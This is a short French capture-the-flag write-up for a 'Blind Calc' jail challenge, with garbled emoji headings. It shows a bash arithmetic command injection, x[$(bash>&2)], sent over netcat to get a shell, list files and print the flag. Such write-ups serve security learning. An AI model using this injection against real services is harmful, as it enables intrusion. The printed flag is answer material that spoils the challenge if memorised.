๐งโ๐ฆฏ Blind Calc
๐ Avant de commencer
Vous pouvez me faire un don via Buy Me a Coffee ou me suivre Github
๐ฉ Avoir le flag
Une fois arrivรฉ dans cette jail. Les seules informations que nous avons sont:
- Nous avons un serveur qui nous demande de faire des calculs
- Le challenge check si on mets des caractรจres hors chiffres et opรฉrateurs
La seule chose que je vois en faisant des calculs c'est de faire une injection de commande.
Enter math > a * 5
0
Enter math > $(ls -la >&2)
./blind.sh: line 3: $(ls -la >&2): syntax error: operand expected (error token is "$(ls -la >&2)")
Bon la seule injection de commande que je connaisse c'est x[$(command)] pour jouer sur les prioritรฉs des opรฉrateurs.
$ nc challs1.pyjail.club 5838
Enter math > x[$(bash>&2)]
ls -la
total 20
drwxr-xr-x 1 nobody nogroup 4096 Aug 2 19:57 .
drwxr-xr-x 1 nobody nogroup 4096 Aug 2 19:55 ..
-rwxr-xr-x 1 nobody nogroup 72 Aug 2 19:56 blind.sh
-r--r--r-- 1 nobody nogroup 37 Aug 2 19:45 flag.txt
-rwxr-xr-x 1 nobody nogroup 49 Aug 2 19:55 run
cat flag.txt
jail{blind-calc_9c701e8c09f6cc0edd6}
๐ Support
๐ Avant de quitter
Vous pouvez me faire un don via Buy Me a Coffee ou me suivre Github